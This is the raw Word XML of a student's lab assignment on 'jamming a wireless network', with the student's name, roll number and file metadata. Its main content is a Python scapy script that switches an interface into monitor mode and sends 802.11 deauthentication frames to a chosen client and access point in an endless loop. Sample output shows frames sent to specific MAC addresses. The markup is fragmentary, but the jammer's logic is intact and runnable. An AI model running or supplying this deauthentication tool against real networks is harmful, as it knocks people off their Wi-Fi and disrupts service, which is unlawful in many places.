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ASSIGNMENT NO.- 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pratik Patil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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Roll No.: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:after="280"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Topic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Writing a Python code for Jamming a Wireless Network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:after="2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Autospacing="0" w:before="0" w:after="280"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CODE: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import time  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import os  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import sys  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import signal  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from scapy.all import *  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conf.verb = 0  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conf.iface = raw_input("Enter the Interface: ")  # Select interface to be used by scapy to send packets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chan = input("Enter the Channel of Access Point: ")     # Channel Selection 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init():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Killing all WIfI Blocking Services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os.system("airmon-ng check kill")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Shifting the interface to monitor mode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os.system("ifconfig wlan0 down")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os.system("iwconfig wlan0 mode monitor")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os.system("ifconfig wlan0 up")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setting the wireless interface channel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os.system("iw dev wlan0 set channel chan")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print("wlan0 initialized to Monitor Mode")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signal_handler(signal, frame):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shifting the interface back to managed mode on exit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os.system("ifconfig wlan0 down")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os.system("iwconfig wlan0 mode managed")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os.system("ifconfig wlan0 up")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restarting the network interface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os.system("service network-manager restart")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"Wi-Fi Deauth Tool Stopped Successfully"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sys.exit(0)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Calling a callback on pressing Ctrl+C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signal.signal(signal.SIGINT, signal_handler)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Starting the program execution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__name__ == "__main__":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init()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ap_mac = raw_input("Enter the MAC Address of Access Point: ")  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="280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# Acess Point MAC Address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client_mac = raw_input("Enter the MAC Adress of Client: ")      # Clinet MAC Address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Creating a deAuth Frame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deAuthFrame=RadioTap()/Dot11(addr1=client_mac,addr2=ap_mac,addr3=ap_mac)/Dot11Deauth()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Sending a deAuth Frame on network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True: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sendp(deAuthFrame)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 "Sent DeAuth Frame to ", client_mac, " from AP ", ap_mac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time.sleep(1)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 wifi_dos.py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Interface: wlan0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Channel of Access Point: 1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wlan0 initialized to Monitor Mode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MAC Address of Access Point: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MAC Adress of Client: 30:07:4D:63:2C:1B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 DeAuth Frame to  30:07:4D:63:2C:1B  from AP  64:A2:F9:D4:A5:3A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^CWi-Fi Deauth Tool Stopped Successfully</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2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spacing w:beforeAutospacing="0" w:before="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'''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b7d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0b7d4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b7d47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LibreOffice/6.4.3.2$Windows_X86_64 LibreOffice_project/747b5d0ebf89f41c860ec2a39efd7cb15b54f2d8</Application>
  <Pages>4</Pages>
  <Words>375</Words>
  <Characters>2456</Characters>
  <CharactersWithSpaces>2947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2019-10-23T14:31:00Z</dcterms:created>
  <dc:creator>HARSHIT SINHA</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-07T22:46:00Z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